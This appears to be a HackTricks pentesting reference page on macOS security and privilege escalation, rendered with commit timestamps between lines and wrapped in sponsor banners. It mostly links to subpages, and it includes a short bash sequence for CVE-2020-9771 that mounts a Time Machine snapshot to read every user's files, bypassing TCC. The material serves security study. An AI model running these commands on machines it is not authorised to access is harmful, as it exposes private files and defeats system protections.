2023-05-09 15:44:54 +00:00
# macOS Security & Privilege Escalation
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
* Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-05-01 16:21:52 +00:00
* **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2023-03-05 18:32:51 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **and** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2023-07-31 15:59:11 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2023-07-14 14:20:34 +00:00
**HackenProof is home to all crypto bug bounties.**
2023-02-27 09:28:45 +00:00
2023-07-14 14:20:34 +00:00
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
2023-02-27 09:28:45 +00:00
2023-07-14 14:20:34 +00:00
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
2023-02-27 09:28:45 +00:00
2023-07-14 14:20:34 +00:00
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof** ](https://hackenproof.com/register ) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
2022-04-28 16:01:33 +00:00
2022-05-01 13:25:53 +00:00
## Basic MacOS
2021-08-14 18:01:10 +00:00
2023-07-30 21:28:42 +00:00
If you are not familiar with macOS, you should start learning the basics of macOS:
2023-05-29 20:18:06 +00:00
2023-06-01 11:07:04 +00:00
* Special macOS **files & permissions:**
2023-05-29 20:18:06 +00:00
2023-06-01 11:07:04 +00:00
{% content-ref url="macos-files-folders-and-binaries/" %}
[macos-files-folders-and-binaries ](macos-files-folders-and-binaries/ )
2023-05-04 23:22:39 +00:00
{% endcontent-ref %}
2023-05-04 19:22:41 +00:00
2023-06-01 11:07:04 +00:00
* Common macOS **users**
2021-08-14 18:01:10 +00:00
2023-06-01 11:07:04 +00:00
{% content-ref url="macos-users.md" %}
[macos-users.md ](macos-users.md )
{% endcontent-ref %}
2021-08-14 18:01:10 +00:00
2023-06-01 11:07:04 +00:00
* **AppleFS**
2021-08-18 16:50:47 +00:00
2023-06-01 11:07:04 +00:00
{% content-ref url="macos-applefs.md" %}
[macos-applefs.md ](macos-applefs.md )
{% endcontent-ref %}
2021-08-18 16:50:47 +00:00
2023-06-01 11:07:04 +00:00
* The **architecture** of the k**ernel**
2021-08-14 18:01:10 +00:00
2023-05-04 23:22:39 +00:00
{% content-ref url="mac-os-architecture/" %}
[mac-os-architecture ](mac-os-architecture/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-08-14 18:01:10 +00:00
2023-06-01 11:07:04 +00:00
* Common macOS n**etwork services & protocols**
2021-08-14 18:01:10 +00:00
2023-06-01 11:07:04 +00:00
{% content-ref url="macos-protocols.md" %}
[macos-protocols.md ](macos-protocols.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-08-14 18:01:10 +00:00
2023-09-10 23:59:38 +00:00
* **Opensource** macOS: [https://opensource.apple.com/ ](https://opensource.apple.com/ )
2023-09-25 17:41:06 +00:00
* To download a `tar.gz` change a URL such as [https://opensource.apple.com/**source**/dyld/ ](https://opensource.apple.com/source/dyld/ ) to [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz** ](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz )
2023-09-10 23:59:38 +00:00
2022-05-01 13:25:53 +00:00
### MacOS MDM
2021-08-14 18:01:10 +00:00
2023-06-01 11:07:04 +00:00
In companies **macOS** systems are highly probably going to be **managed with a MDM** . Therefore, from the perspective of an attacker is interesting to know **how that works** :
2023-06-13 00:15:20 +00:00
{% content-ref url="../macos-red-teaming/macos-mdm/" %}
[macos-mdm ](../macos-red-teaming/macos-mdm/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-08-14 18:01:10 +00:00
2022-05-01 13:25:53 +00:00
### MacOS - Inspecting, Debugging and Fuzzing
2021-08-15 22:40:36 +00:00
2023-05-12 16:36:21 +00:00
{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %}
[macos-apps-inspecting-debugging-and-fuzzing ](macos-apps-inspecting-debugging-and-fuzzing/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-08-14 18:01:10 +00:00
2023-06-01 20:34:49 +00:00
## MacOS Security Protections
2021-07-17 00:28:18 +00:00
2023-06-01 21:44:32 +00:00
{% content-ref url="macos-security-protections/" %}
[macos-security-protections ](macos-security-protections/ )
2023-06-01 20:34:49 +00:00
{% endcontent-ref %}
2021-07-27 10:55:02 +00:00
2023-06-01 20:34:49 +00:00
## Attack Surface
2021-07-26 11:22:19 +00:00
2023-06-01 20:34:49 +00:00
### File Permissions
2021-07-22 14:43:04 +00:00
2023-06-01 20:34:49 +00:00
If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges** .\
This could occur in the following situations:
2021-07-22 14:43:04 +00:00
2023-06-01 20:34:49 +00:00
* File used was already created by a user (owned by the user)
* File used is writable by the user because of a group
* File used is inside a directory owned by the user (the user could create the file)
* File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file)
2021-08-10 14:04:23 +00:00
2023-06-01 20:34:49 +00:00
Being able to **create a file** that is going to be **used by root** , allows a user to **take advantage of its content** or even create **symlinks/hardlinks** to point it to another place.
2021-08-10 14:04:23 +00:00
2023-06-08 00:25:42 +00:00
For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers** :
2023-06-08 10:01:03 +00:00
{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %}
[macos-installers-abuse.md ](macos-files-folders-and-binaries/macos-installers-abuse.md )
2023-06-08 00:25:42 +00:00
{% endcontent-ref %}
2023-06-01 20:34:49 +00:00
### Entitlements and Privileges abuse via process abuse
2021-08-10 14:04:23 +00:00
2023-06-01 21:44:32 +00:00
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox ](macos-security-protections/macos-sandbox/ ) or [TCC ](macos-security-protections/macos-tcc/ ).
2021-08-10 14:04:23 +00:00
2023-06-01 21:44:32 +00:00
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse ](macos-proces-abuse/ )
2023-05-28 15:30:30 +00:00
{% endcontent-ref %}
2023-05-26 00:05:25 +00:00
2023-06-10 11:06:21 +00:00
### File Extension & URL scheme app handlers
2021-08-10 14:04:23 +00:00
2023-06-10 11:06:21 +00:00
Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols
2021-08-10 14:04:23 +00:00
2023-06-01 21:44:32 +00:00
{% content-ref url="macos-file-extension-apps.md" %}
[macos-file-extension-apps.md ](macos-file-extension-apps.md )
2023-05-26 15:11:27 +00:00
{% endcontent-ref %}
2021-08-10 14:04:23 +00:00
2023-06-01 20:34:49 +00:00
## MacOS Privilege Escalation
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
The **only privileged** needed is for the application used (like `Terminal` ) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
{% code overflow="wrap" %}
2021-07-19 23:13:08 +00:00
```bash
2023-06-01 20:34:49 +00:00
# Create snapshot
tmutil localsnapshot
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
# Access it
ls /tmp/snap/Users/admin_user # This will work
2021-07-19 23:13:08 +00:00
```
{% endcode %}
2023-06-01 20:34:49 +00:00
A more detailed explanation can be [**found in the original report** ](https://theevilbit.github.io/posts/cve\_2020\_9771/ )**.**
2021-07-19 23:13:08 +00:00
2023-06-01 20:34:49 +00:00
### Sensitive Information
2021-07-19 23:13:08 +00:00
2023-06-01 21:44:32 +00:00
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md ](macos-files-folders-and-binaries/macos-sensitive-locations.md )
2023-05-15 08:11:15 +00:00
{% endcontent-ref %}
2023-06-01 20:34:49 +00:00
### Linux Privesc
2021-08-10 14:04:23 +00:00
2023-06-01 20:34:49 +00:00
First of all, please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
2021-08-15 22:40:36 +00:00
2023-06-01 20:34:49 +00:00
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation ](../../linux-hardening/privilege-escalation/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-08-15 22:40:36 +00:00
2022-05-01 13:25:53 +00:00
## References
2021-07-29 00:18:11 +00:00
2022-04-05 22:24:52 +00:00
* [**OS X Incident Response: Scripting and Analysis** ](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS )
* [**https://taomm.org/vol1/analysis.html** ](https://taomm.org/vol1/analysis.html )
* [**https://github.com/NicolasGrimonpont/Cheatsheet** ](https://github.com/NicolasGrimonpont/Cheatsheet )
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ** ](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ )
2023-05-26 00:05:25 +00:00
* [**https://www.youtube.com/watch?v=vMGiplQtjTY** ](https://www.youtube.com/watch?v=vMGiplQtjTY )
2022-04-28 16:01:33 +00:00
2023-07-31 15:59:11 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 14:20:34 +00:00
**HackenProof is home to all crypto bug bounties.**
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
2022-04-28 16:01:33 +00:00
2023-07-14 14:20:34 +00:00
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
2022-04-28 16:01:33 +00:00
2023-07-14 14:20:34 +00:00
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
2023-02-27 09:28:45 +00:00
2023-07-14 14:20:34 +00:00
[**Sign up on HackenProof** ](https://hackenproof.com/register ) start earning from your hacks!
2023-02-27 09:28:45 +00:00
2023-07-14 14:20:34 +00:00
{% embed url="https://hackenproof.com/register" %}
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
* Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-05-01 16:21:52 +00:00
* **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2023-03-05 18:32:51 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **and** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >